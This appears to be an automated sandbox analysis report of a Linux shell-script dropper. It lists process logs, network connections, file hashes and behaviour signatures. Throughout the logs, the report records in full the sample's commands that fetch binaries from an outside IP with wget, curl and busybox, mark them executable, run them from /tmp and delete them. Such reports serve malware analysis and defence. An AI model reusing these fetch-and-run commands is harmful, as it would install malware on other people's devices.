[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/chmod
[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK
[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/rm
[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/wget
[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/chmod
[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/rm
[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/wget
[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/chmod
[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw
[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/rm
[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/wget
[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/chmod
[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ
[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/rm
[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/chmod
[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q
[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/rm
[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-21 01:28
Reported
2024-10-21 01:30
Platform
debian9-mipsel-20240729-en
Max time kernel
95s
Max time network
97s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | N/A |
| N/A | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | N/A |
| N/A | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | N/A |
| N/A | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | N/A |
| N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | N/A |
| N/A | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | N/A |
| N/A | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | N/A |
| N/A | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | N/A |
| N/A | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | N/A |
| N/A | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | N/A |
| N/A | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | N/A |
| N/A | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | N/A |
| N/A | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | N/A |
| N/A | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | N/A |
| N/A | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | N/A |
| N/A | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | N/A |
| N/A | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | N/A |
| N/A | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | N/A |
| N/A | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | N/A |
| N/A | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | N/A |
| N/A | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | N/A |
| N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | N/A |
| N/A | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | N/A |
| N/A | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | N/A |
| N/A | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | N/A |
| N/A | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ | /usr/bin/curl | N/A |
Processes
/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/chmod
[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt
[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/bin/rm
[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]
/usr/bin/wget
[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/chmod
[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw
[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/bin/rm
[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]
/usr/bin/wget
[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/chmod
[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ
[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/bin/rm
[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/chmod
[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q
[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/bin/rm
[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]
/usr/bin/wget
[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/chmod
[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG
[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/bin/rm
[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]
/usr/bin/wget
[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/chmod
[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK
[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/bin/rm
[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]
/usr/bin/wget
[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/chmod
[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW
[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/bin/rm
[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]
/usr/bin/wget
[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/chmod
[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq
[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/bin/rm
[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]
/usr/bin/wget
[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/chmod
[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh
[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/bin/rm
[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]
/usr/bin/wget
[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/chmod
[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4
[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/bin/rm
[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]
/usr/bin/wget
[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]
/bin/chmod
